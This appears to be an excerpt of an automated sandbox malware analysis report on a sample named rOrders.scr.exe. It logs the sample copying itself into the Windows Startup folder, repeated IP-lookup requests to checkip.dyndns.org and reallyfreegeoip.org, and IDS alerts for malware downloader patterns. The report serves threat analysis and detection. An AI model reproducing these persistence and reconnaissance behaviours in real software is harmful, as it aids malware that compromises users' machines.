Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior

Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4x nop then jmp 02B5F1F6h	4_2_02B5F007
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4x nop then jmp 02B5FB80h	4_2_02B5F007
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	4_2_02B5E528
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	4_2_02B5EB5B
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	4_2_02B5ED3C
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4x nop then jmp 069C8945h	4_2_069C8608
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4x nop then jmp 069C0FF1h	4_2_069C0D48
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_069C36CE
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4x nop then jmp 069C6171h	4_2_069C5EC8
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4x nop then jmp 069C58C1h	4_2_069C5618
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4x nop then jmp 069C6A21h	4_2_069C6778
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4x nop then jmp 069C0741h	4_2_069C0498
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4x nop then jmp 069C7751h	4_2_069C74A8
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4x nop then jmp 069C8001h	4_2_069C7D58
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4x nop then jmp 069C5D19h	4_2_069C5A70
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_069C33B8
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	4_2_069C33A8
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4x nop then jmp 069C6E79h	4_2_069C6BD0
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4x nop then jmp 069C65C9h	4_2_069C6320
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4x nop then jmp 069C0B99h	4_2_069C08F0
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4x nop then jmp 069C72FAh	4_2_069C7050
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4x nop then jmp 069C02E9h	4_2_069C0040
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4x nop then jmp 069C5441h	4_2_069C5198
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4x nop then jmp 069C8459h	4_2_069C81B0
Source: C:\Users\user\Desktop\rOrders.scr.exe	Code function: 4x nop then jmp 069C7BA9h	4_2_069C7900
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 014BF1F6h	9_2_014BF007
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 014BFB80h	9_2_014BF007
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	9_2_014BE528
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 069F1A38h	9_2_069F1620
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 069F0751h	9_2_069F04A0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 069F02F1h	9_2_069F0040
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 069F1471h	9_2_069F11C0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 069FD1A1h	9_2_069FCEF8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 069F1A38h	9_2_069F161F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 069FF8B9h	9_2_069FF610
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 069FC8F1h	9_2_069FC648
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 069FDA51h	9_2_069FD7A8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 069FE759h	9_2_069FE4B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 069FB791h	9_2_069FB4E8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 069FDEA9h	9_2_069FDC00
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 069FC041h	9_2_069FBD98
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 069F1011h	9_2_069F0D60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 069FF009h	9_2_069FED60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 069FCD49h	9_2_069FCAA0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 069FFD11h	9_2_069FFA68
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 069FD5F9h	9_2_069FD350
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 069FE301h	9_2_069FE058
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 069FF461h	9_2_069FF1B8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 069FC499h	9_2_069FC1F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 069FEBB1h	9_2_069FE908
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 069F0BB1h	9_2_069F0900
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 069FBBE9h	9_2_069FB940
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 069F1A38h	9_2_069F1966
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06A28945h	9_2_06A28608
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06A20FF1h	9_2_06A20D48
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06A26171h	9_2_06A25EC8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	9_2_06A236CE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06A258C1h	9_2_06A25618
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06A25D19h	9_2_06A25A70
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	9_2_06A233A8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	9_2_06A233B8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06A26E79h	9_2_06A26BD0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06A265C9h	9_2_06A26320
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06A26A21h	9_2_06A26778
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06A27751h	9_2_06A274A8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06A20741h	9_2_06A20498
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06A20B99h	9_2_06A208F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06A202E9h	9_2_06A20040
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06A272FAh	9_2_06A27050
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06A28459h	9_2_06A281B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06A25441h	9_2_06A25198
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06A27BA9h	9_2_06A27900
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe	Code function: 4x nop then jmp 06A28001h	9_2_06A27D58

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org

Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49741 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49710 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49724 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49708 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49794 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49717 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49723 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49740 -> 104.21.32.1:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49707 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49727 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: rOrders.scr.exe, 00000004.00000002.4536657049.0000000002F3F000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002E47000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002EE7000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002D68000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: 00.exe, 00000009.00000002.4538005534.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.comP
Source: rOrders.scr.exe, 00000004.00000002.4536657049.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002F3F000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002E47000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002F03000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002EE7000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4536657049.0000000002EDA000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002E32000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002E09000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002D68000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002DAB000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: rOrders.scr.exe, 00000004.00000002.4536657049.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, 00.exe, 00000009.00000002.4538005534.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: rOrders.scr.exe, 00000000.00000002.4557355431.0000000003CB2000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000000.00000002.4557355431.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000000.00000002.4557355431.0000000003CD0000.00000004.00000800.00020000.00000000.sdmp, rOrders.scr.exe, 00000004.00000002.4531261400.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: svchost.exe, 00000005.00000002.3709232535.000002A0CFE00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: qmgr.db.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.5.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
